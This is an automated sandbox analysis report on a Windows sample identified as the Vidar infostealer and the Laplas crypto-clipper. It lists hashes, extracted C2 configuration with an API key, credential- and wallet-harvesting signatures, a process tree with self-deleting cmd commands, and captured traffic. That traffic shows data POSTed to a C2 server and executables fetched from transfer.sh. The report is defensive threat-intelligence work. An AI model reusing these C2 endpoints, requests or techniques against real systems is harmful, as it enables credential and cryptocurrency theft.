Analysis

  • max time kernel
    108s
  • max time network
    137s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230221-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20230221-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    13-04-2023 07:40

General

  • Target

    544d4135b43f7d7d687d66521fada60e7007719bf2e836fd5f9b062a08f1ed9c.exe

  • Size

    329KB

  • MD5

    ac97e53dca69adc7f46fc3a6a0f03427

  • SHA1

    1388b68cd15b853d3b24069a076fb6f2520a1714

  • SHA256

    544d4135b43f7d7d687d66521fada60e7007719bf2e836fd5f9b062a08f1ed9c

  • SHA512

    a253d472369d66aacd481150b356a0aadb0db8a83a3c72975380dbcf679dcc064f499ff88cd45db675bcbf15692301174f62fbb65fb3fd02aa48f99b723c3963

  • SSDEEP

    6144:x+pl5A+GPc6uju4rkX2WEF3OYDkGpLlvac3FxC7lARbz:xXbwnjR3OYHLFxQ

Malware Config

Extracted

Family

vidar

Version

3.4

Botnet

e749025c61b2caca10aa829a9e1a65a1

C2

https://steamcommunity.com/profiles/76561199494593681

https://t.me/auftriebs

Attributes
  • profile_id_v2

    e749025c61b2caca10aa829a9e1a65a1

  • user_agent

    Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0

Extracted

Family

laplas

C2

http://185.106.92.74

Attributes
  • api_key

    bc2dceabe69fa26dbf4dd8295d65e03e1990633a88c1c8410825c9266b239396

Signatures

  • Laplas Clipper

    Laplas is a crypto wallet stealer with three variants written in Golang, C#, and C++.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\544d4135b43f7d7d687d66521fada60e7007719bf2e836fd5f9b062a08f1ed9c.exe
    "C:\Users\Admin\AppData\Local\Temp\544d4135b43f7d7d687d66521fada60e7007719bf2e836fd5f9b062a08f1ed9c.exe"
    1⤵
    • Checks computer location settings
    • Loads dropped DLL
    • Checks processor information in registry
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:4656
    • C:\ProgramData\51691604086040263760.exe
      "C:\ProgramData\51691604086040263760.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2780
      • C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe
        "C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious behavior: EnumeratesProcesses
        PID:3124
    • C:\ProgramData\57043793385267370343.exe
      "C:\ProgramData\57043793385267370343.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:4288
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\ProgramData\57043793385267370343.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2184
        • C:\Windows\system32\choice.exe
          choice /C Y /N /D Y /T 0
          4⤵
          PID:3964
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\544d4135b43f7d7d687d66521fada60e7007719bf2e836fd5f9b062a08f1ed9c.exe" & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2944
      • C:\Windows\SysWOW64\timeout.exe
        timeout /t 6
        3⤵
        • Delays execution with timeout.exe
        PID:1448
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4656 -s 2100
      2⤵
      • Program crash
      PID:1368
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4656 -ip 4656
    1⤵
    PID:1952

      Network

      • flag-us
        DNS
        58.55.71.13.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        58.55.71.13.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        t.me
        544d4135b43f7d7d687d66521fada60e7007719bf2e836fd5f9b062a08f1ed9c.exe
        Remote address:
        8.8.8.8:53
        Request
        t.me
        IN A
        Response
        t.me
        IN A
        149.154.167.99
      • flag-nl
        GET
        https://t.me/auftriebs
        544d4135b43f7d7d687d66521fada60e7007719bf2e836fd5f9b062a08f1ed9c.exe
        Remote address:
        149.154.167.99:443
        Request
        GET /auftriebs HTTP/1.1
        X-Id: e749025c61b2caca10aa829a9e1a65a1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0
        Host: t.me
        Response
        HTTP/1.1 200 OK
        Server: nginx/1.18.0
        Date: Thu, 13 Apr 2023 07:40:13 GMT
        Content-Type: text/html; charset=utf-8
        Content-Length: 12367
        Connection: keep-alive
        Set-Cookie: stel_ssid=896fdea156f6ef4bec_10485361671066069921; expires=Fri, 14 Apr 2023 07:40:13 GMT; path=/; samesite=None; secure; HttpOnly
        Pragma: no-cache
        Cache-control: no-store
        X-Frame-Options: ALLOW-FROM https://web.telegram.org
        Content-Security-Policy: frame-ancestors https://web.telegram.org
        Strict-Transport-Security: max-age=35768000
      • flag-us
        DNS
        99.167.154.149.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        99.167.154.149.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        41.249.124.192.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        41.249.124.192.in-addr.arpa
        IN PTR
        Response
        41.249.124.192.in-addr.arpa
        IN PTR
        cloudproxy10041.sucuri.net
      • flag-de
        GET
        http://195.201.251.197/
        544d4135b43f7d7d687d66521fada60e7007719bf2e836fd5f9b062a08f1ed9c.exe
        Remote address:
        195.201.251.197:80
        Request
        GET / HTTP/1.1
        X-Id: e749025c61b2caca10aa829a9e1a65a1
        User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0
        Host: 195.201.251.197
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Thu, 13 Apr 2023 07:40:14 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: keep-alive
      • flag-de
        GET
        http://195.201.251.197/download.zip
        544d4135b43f7d7d687d66521fada60e7007719bf2e836fd5f9b062a08f1ed9c.exe
        Remote address:
        195.201.251.197:80
        Request
        GET /download.zip HTTP/1.1
        User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0
        Host: 195.201.251.197
        Cache-Control: no-cache
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Thu, 13 Apr 2023 07:40:14 GMT
        Content-Type: application/zip
        Content-Length: 2685679
        Last-Modified: Mon, 12 Sep 2022 13:14:59 GMT
        Connection: keep-alive
        ETag: "631f30d3-28faef"
        Accept-Ranges: bytes
      • flag-de
        POST
        http://195.201.251.197/
        544d4135b43f7d7d687d66521fada60e7007719bf2e836fd5f9b062a08f1ed9c.exe
        Remote address:
        195.201.251.197:80
        Request
        POST / HTTP/1.1
        X-Id: e749025c61b2caca10aa829a9e1a65a1
        X-Token: 5d06d0d635de2431f40d6f3cdfe1a5a2
        X-hwid: c22502d548d63305298366-7669410e-8e67-41c6-8402-8218-806e6f6e6963
        Content-Type: multipart/form-data; boundary=----3170944682749518
        User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0
        Host: 195.201.251.197
        Content-Length: 89323
        Connection: Keep-Alive
        Cache-Control: no-cache
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Thu, 13 Apr 2023 07:40:20 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: keep-alive
      • flag-us
        DNS
        197.251.201.195.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        197.251.201.195.in-addr.arpa
        IN PTR
        Response
        197.251.201.195.in-addr.arpa
        IN PTR
        static.197.251.201.195.clients.your-server.de
      • flag-us
        DNS
        transfer.sh
        544d4135b43f7d7d687d66521fada60e7007719bf2e836fd5f9b062a08f1ed9c.exe
        Remote address:
        8.8.8.8:53
        Request
        transfer.sh
        IN A
        Response
        transfer.sh
        IN A
        144.76.136.153
      • flag-de
        GET
        https://transfer.sh/get/8n86mq/sima.exe
        544d4135b43f7d7d687d66521fada60e7007719bf2e836fd5f9b062a08f1ed9c.exe
        Remote address:
        144.76.136.153:443
        Request
        GET /get/8n86mq/sima.exe HTTP/1.1
        Host: transfer.sh
        Cache-Control: no-cache
        Response
        HTTP/1.1 200 OK
        Server: nginx/1.18.0
        Date: Thu, 13 Apr 2023 07:40:21 GMT
        Content-Type: application/x-ms-dos-executable
        Content-Length: 7567360
        Connection: keep-alive
        Cache-Control: no-store
        Content-Disposition: attachment; filename="sima.exe"
        Retry-After: Thu, 13 Apr 2023 09:40:24 GMT
        X-Made-With: <3 by DutchCoders
        X-Ratelimit-Key: 127.0.0.1,154.61.71.13,154.61.71.13
        X-Ratelimit-Limit: 10
        X-Ratelimit-Rate: 600
        X-Ratelimit-Remaining: 9
        X-Ratelimit-Reset: 1681371624
        X-Remaining-Days: n/a
        X-Remaining-Downloads: n/a
        X-Served-By: Proudly served by DutchCoders
        Strict-Transport-Security: max-age=63072000
      • flag-de
        GET
        https://transfer.sh/get/lqTwP6/pipka.exe
        544d4135b43f7d7d687d66521fada60e7007719bf2e836fd5f9b062a08f1ed9c.exe
        Remote address:
        144.76.136.153:443
        Request
        GET /get/lqTwP6/pipka.exe HTTP/1.1
        Host: transfer.sh
        Cache-Control: no-cache
        Response
        HTTP/1.1 200 OK
        Server: nginx/1.18.0
        Date: Thu, 13 Apr 2023 07:40:26 GMT
        Content-Type: application/x-ms-dos-executable
        Content-Length: 4514816
        Connection: keep-alive
        Cache-Control: no-store
        Content-Disposition: attachment; filename="pipka.exe"
        Retry-After: Thu, 13 Apr 2023 09:40:30 GMT
        X-Made-With: <3 by DutchCoders
        X-Ratelimit-Key: 127.0.0.1,154.61.71.13,154.61.71.13
        X-Ratelimit-Limit: 10
        X-Ratelimit-Rate: 600
        X-Ratelimit-Remaining: 9
        X-Ratelimit-Reset: 1681371630
        X-Remaining-Days: n/a
        X-Remaining-Downloads: n/a
        X-Served-By: Proudly served by DutchCoders
        Strict-Transport-Security: max-age=63072000
      • flag-us
        DNS
        153.136.76.144.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        153.136.76.144.in-addr.arpa
        IN PTR
        Response
        153.136.76.144.in-addr.arpa
        IN PTR
        transfer.sh
      • flag-us
        DNS
        67.55.52.23.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        67.55.52.23.in-addr.arpa
        IN PTR
        Response
        67.55.52.23.in-addr.arpa
        IN PTR
        a23-52-55-67.deploy.static.akamaitechnologies.com
      • flag-us
        DNS
        9.175.53.84.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        9.175.53.84.in-addr.arpa
        IN PTR
        Response
        9.175.53.84.in-addr.arpa
        IN PTR
        a84-53-175-9.deploy.static.akamaitechnologies.com
      • flag-us
        DNS
        95.221.229.192.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        95.221.229.192.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        2.136.104.51.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        2.136.104.51.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        13.86.106.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        13.86.106.20.in-addr.arpa
        IN PTR
        Response
      • flag-de
        GET
        http://185.106.92.74/bot/regex
        svcservice.exe
        Remote address:
        185.106.92.74:80
        Request
        GET /bot/regex HTTP/1.1
        Host: 185.106.92.74
        Cache-Control: no-cache
        Response
        HTTP/1.1 200 OK
        Server: nginx/1.18.0 (Ubuntu)
        Date: Thu, 13 Apr 2023 07:40:59 GMT
        Content-Type: text/plain; charset=utf-8
        Content-Length: 633
        Connection: keep-alive
      • flag-de
        GET
        http://185.106.92.74/bot/online?guid=UXINIZSV\\Admin&key=bc2dceabe69fa26dbf4dd8295d65e03e1990633a88c1c8410825c9266b239396
        svcservice.exe
        Remote address:
        185.106.92.74:80
        Request
        GET /bot/online?guid=UXINIZSV\\Admin&key=bc2dceabe69fa26dbf4dd8295d65e03e1990633a88c1c8410825c9266b239396 HTTP/1.1
        Host: 185.106.92.74
        Cache-Control: no-cache
        Response
        HTTP/1.1 200 OK
        Server: nginx/1.18.0 (Ubuntu)
        Date: Thu, 13 Apr 2023 07:41:00 GMT
        Content-Type: text/plain; charset=utf-8
        Content-Length: 2
        Connection: keep-alive
      • flag-de
        GET
        http://185.106.92.74/bot/regex
        svcservice.exe
        Remote address:
        185.106.92.74:80
        Request
        GET /bot/regex HTTP/1.1
        Host: 185.106.92.74
        Cache-Control: no-cache
        Response
        HTTP/1.1 200 OK
        Server: nginx/1.18.0 (Ubuntu)
        Date: Thu, 13 Apr 2023 07:41:57 GMT
        Content-Type: text/plain; charset=utf-8
        Content-Length: 633
        Connection: keep-alive
      • flag-de
        GET
        http://185.106.92.74/bot/online?guid=UXINIZSV\\Admin&key=bc2dceabe69fa26dbf4dd8295d65e03e1990633a88c1c8410825c9266b239396
        svcservice.exe
        Remote address:
        185.106.92.74:80
        Request
        GET /bot/online?guid=UXINIZSV\\Admin&key=bc2dceabe69fa26dbf4dd8295d65e03e1990633a88c1c8410825c9266b239396 HTTP/1.1
        Host: 185.106.92.74
        Cache-Control: no-cache
        Response
        HTTP/1.1 200 OK
        Server: nginx/1.18.0 (Ubuntu)
        Date: Thu, 13 Apr 2023 07:41:57 GMT
        Content-Type: text/plain; charset=utf-8
        Content-Length: 2
        Connection: keep-alive
      • flag-us
        DNS
        74.92.106.185.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        74.92.106.185.in-addr.arpa
        IN PTR
        Response
        74.92.106.185.in-addr.arpa
        IN PTR
        instance25567.waicore.network
      • flag-us
        DNS
        74.92.106.185.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        74.92.106.185.in-addr.arpa
        IN PTR
        Response
        74.92.106.185.in-addr.arpa
        IN PTR
        instance25567.waicore.network
      • flag-us
        DNS
        1.77.109.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        1.77.109.52.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        171.39.242.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        171.39.242.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        2.36.159.162.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        2.36.159.162.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        171.39.242.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        171.39.242.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        50.23.12.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        50.23.12.20.in-addr.arpa
        IN PTR
        Response
      • 209.197.3.8:80
        260 B
        5
      • 149.154.167.99:443
        https://t.me/auftriebs
        tls, http
        544d4135b43f7d7d687d66521fada60e7007719bf2e836fd5f9b062a08f1ed9c.exe
        1.6kB
        19.5kB
        24
        20

        HTTP Request

        GET https://t.me/auftriebs

        HTTP Response

        200
      • 195.201.251.197:80
        http://195.201.251.197/
        http
        544d4135b43f7d7d687d66521fada60e7007719bf2e836fd5f9b062a08f1ed9c.exe
        197.4kB
        2.8MB
        2058
        2017

        HTTP Request

        GET http://195.201.251.197/

        HTTP Response

        200

        HTTP Request

        GET http://195.201.251.197/download.zip

        HTTP Response

        200

        HTTP Request

        POST http://195.201.251.197/

        HTTP Response

        200
      • 144.76.136.153:443
        https://transfer.sh/get/lqTwP6/pipka.exe
        tls, http
        544d4135b43f7d7d687d66521fada60e7007719bf2e836fd5f9b062a08f1ed9c.exe
        416.8kB
        12.5MB
        8917
        8913

        HTTP Request

        GET https://transfer.sh/get/8n86mq/sima.exe

        HTTP Response

        200

        HTTP Request

        GET https://transfer.sh/get/lqTwP6/pipka.exe

        HTTP Response

        200
      • 52.182.143.210:443
        322 B
        7
      • 20.54.89.15:443
        260 B
        5
      • 185.106.92.74:80
        http://185.106.92.74/bot/online?guid=UXINIZSV\\Admin&key=bc2dceabe69fa26dbf4dd8295d65e03e1990633a88c1c8410825c9266b239396
        http
        svcservice.exe
        916 B
        2.3kB
        10
        9

        HTTP Request

        GET http://185.106.92.74/bot/regex

        HTTP Response

        200

        HTTP Request

        GET http://185.106.92.74/bot/online?guid=UXINIZSV\\Admin&key=bc2dceabe69fa26dbf4dd8295d65e03e1990633a88c1c8410825c9266b239396

        HTTP Response

        200

        HTTP Request

        GET http://185.106.92.74/bot/regex

        HTTP Response

        200

        HTTP Request

        GET http://185.106.92.74/bot/online?guid=UXINIZSV\\Admin&key=bc2dceabe69fa26dbf4dd8295d65e03e1990633a88c1c8410825c9266b239396

        HTTP Response

        200
      • 209.197.3.8:80
        322 B
        7
      • 209.197.3.8:80
        322 B
        7
      • 173.223.113.164:443
        322 B
        7
      • 173.223.113.131:80
        322 B
        7
      • 204.79.197.203:80
        322 B
        7
      • 8.8.8.8:53
        58.55.71.13.in-addr.arpa
        dns
        70 B
        144 B
        1
        1

        DNS Request

        58.55.71.13.in-addr.arpa

      • 8.8.8.8:53
        t.me
        dns
        544d4135b43f7d7d687d66521fada60e7007719bf2e836fd5f9b062a08f1ed9c.exe
        50 B
        66 B
        1
        1

        DNS Request

        t.me

        DNS Response

        149.154.167.99

      • 8.8.8.8:53
        99.167.154.149.in-addr.arpa
        dns
        73 B
        166 B
        1
        1

        DNS Request

        99.167.154.149.in-addr.arpa

      • 8.8.8.8:53
        41.249.124.192.in-addr.arpa
        dns
        73 B
        113 B
        1
        1

        DNS Request

        41.249.124.192.in-addr.arpa

      • 8.8.8.8:53
        197.251.201.195.in-addr.arpa
        dns
        74 B
        133 B
        1
        1

        DNS Request

        197.251.201.195.in-addr.arpa

      • 8.8.8.8:53
        transfer.sh
        dns
        544d4135b43f7d7d687d66521fada60e7007719bf2e836fd5f9b062a08f1ed9c.exe
        57 B
        73 B
        1
        1

        DNS Request

        transfer.sh

        DNS Response

        144.76.136.153

      • 8.8.8.8:53
        153.136.76.144.in-addr.arpa
        dns
        73 B
        98 B
        1
        1

        DNS Request

        153.136.76.144.in-addr.arpa

      • 8.8.8.8:53
        67.55.52.23.in-addr.arpa
        dns
        70 B
        133 B
        1
        1

        DNS Request

        67.55.52.23.in-addr.arpa

      • 8.8.8.8:53
        9.175.53.84.in-addr.arpa
        dns
        70 B
        133 B
        1
        1

        DNS Request

        9.175.53.84.in-addr.arpa

      • 8.8.8.8:53
        95.221.229.192.in-addr.arpa
        dns
        73 B
        144 B
        1
        1

        DNS Request

        95.221.229.192.in-addr.arpa

      • 8.8.8.8:53
        2.136.104.51.in-addr.arpa
        dns
        71 B
        157 B
        1
        1

        DNS Request

        2.136.104.51.in-addr.arpa

      • 8.8.8.8:53
        13.86.106.20.in-addr.arpa
        dns
        71 B
        157 B
        1
        1

        DNS Request

        13.86.106.20.in-addr.arpa

      • 8.8.8.8:53
        74.92.106.185.in-addr.arpa
        dns
        144 B
        230 B
        2
        2

        DNS Request

        74.92.106.185.in-addr.arpa

        DNS Request

        74.92.106.185.in-addr.arpa

      • 8.8.8.8:53
        1.77.109.52.in-addr.arpa
        dns
        70 B
        144 B
        1
        1

        DNS Request

        1.77.109.52.in-addr.arpa

      • 8.8.8.8:53
        171.39.242.20.in-addr.arpa
        dns
        72 B
        158 B
        1
        1

        DNS Request

        171.39.242.20.in-addr.arpa

      • 8.8.8.8:53
        2.36.159.162.in-addr.arpa
        dns
        71 B
        133 B
        1
        1

        DNS Request

        2.36.159.162.in-addr.arpa

      • 8.8.8.8:53
        171.39.242.20.in-addr.arpa
        dns
        72 B
        158 B
        1
        1

        DNS Request

        171.39.242.20.in-addr.arpa

      • 8.8.8.8:53
        50.23.12.20.in-addr.arpa
        dns
        70 B
        156 B
        1
        1

        DNS Request

        50.23.12.20.in-addr.arpa

      MITRE ATT&CK Enterprise v6

      Downloads

      • C:\ProgramData\51691604086040263760.exe

        Filesize

        7.2MB

        MD5

        c5e0fb4ecaa8a7481a283099d604f7a0

        SHA1

        df4b0c0cc823da2b0443076650c292b43dd9de33

        SHA256

        c6c03e97c5de0c9eb264e4914d8c7f64d7e3528cc696f613e451a294262f3c42

        SHA512

        375677d0cc802b09c7d1532d162a91a8eec4679f7639ef38dca9a9d3a03e20b3ab54707af7ffb138d00ec93ea4b34b6db0b33f365dc888ff9056c808a239bc57

      • C:\ProgramData\57043793385267370343.exe

        Filesize

        4.3MB

        MD5

        c4ab3149ef02a36d663699a8c541933e

        SHA1

        67088f5eff9ec575775b711c9e3650d12d7f4d5c

        SHA256

        0a0fbd6af9e5d110118f02b87f9a92f9f58fb100f6d9883d55a6aae6c548b4ce

        SHA512

        88b10f81b2cd273fefeffb4c2078807e89b4b756d50110b61e9f89092715f29ba8d1803f64bc971c1293dc624b92d0b7f05612ae661dd8d24e47d39047a4b7b4

      • C:\ProgramData\mozglue.dll

        Filesize

        593KB

        MD5

        c8fd9be83bc728cc04beffafc2907fe9

        SHA1

        95ab9f701e0024cedfbd312bcfe4e726744c4f2e

        SHA256

        ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

        SHA512

        fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

      • C:\ProgramData\nss3.dll

        Filesize

        2.0MB

        MD5

        1cc453cdf74f31e4d913ff9c10acdde2

        SHA1

        6e85eae544d6e965f15fa5c39700fa7202f3aafe

        SHA256

        ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

        SHA512

        dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

      • C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe

        Filesize

        837.2MB

        MD5

        6fb91749bfaa5cf0b15c3915dd1b459c

        SHA1

        5e64c709daee7a71e1f65ebe0374a8b887435700

        SHA256

        0ad598bcfbdd22cd31012caced54fedcfeb2762fa1cfa1594e647848254b3f66

        SHA512

        aaa7fdc3248ee2750c13081c9758f8e9b3cbcdb23f218ed41b67bedbef32063c3b574254bf9dbaef0eac912bfa6ad40dcfb6412898b4a0d4f9a39a5a2f745cfb

      • memory/2780-236-0x0000000000550000-0x000000000108A000-memory.dmp

        Filesize

        11.2MB

      • memory/2780-235-0x0000000000530000-0x0000000000531000-memory.dmp

        Filesize

        4KB

      • memory/2780-234-0x00000000004C0000-0x00000000004C1000-memory.dmp

        Filesize

        4KB

      • memory/3124-263-0x00000000011D0000-0x00000000011D1000-memory.dmp

        Filesize

        4KB

      • memory/3124-264-0x00000000011E0000-0x00000000011E1000-memory.dmp

        Filesize

        4KB

      • memory/3124-265-0x0000000000550000-0x000000000108A000-memory.dmp

        Filesize

        11.2MB

      • memory/4288-248-0x0000000000D10000-0x0000000001B73000-memory.dmp

        Filesize

        14.4MB

      • memory/4288-262-0x0000000000D10000-0x0000000001B73000-memory.dmp

        Filesize

        14.4MB

      • memory/4656-134-0x00000000020D0000-0x0000000002127000-memory.dmp

        Filesize

        348KB

      • memory/4656-249-0x0000000000400000-0x00000000004C2000-memory.dmp

        Filesize

        776KB

      • memory/4656-222-0x0000000000400000-0x00000000004C2000-memory.dmp

        Filesize

        776KB

      • memory/4656-146-0x0000000061E00000-0x0000000061EF3000-memory.dmp

        Filesize

        972KB
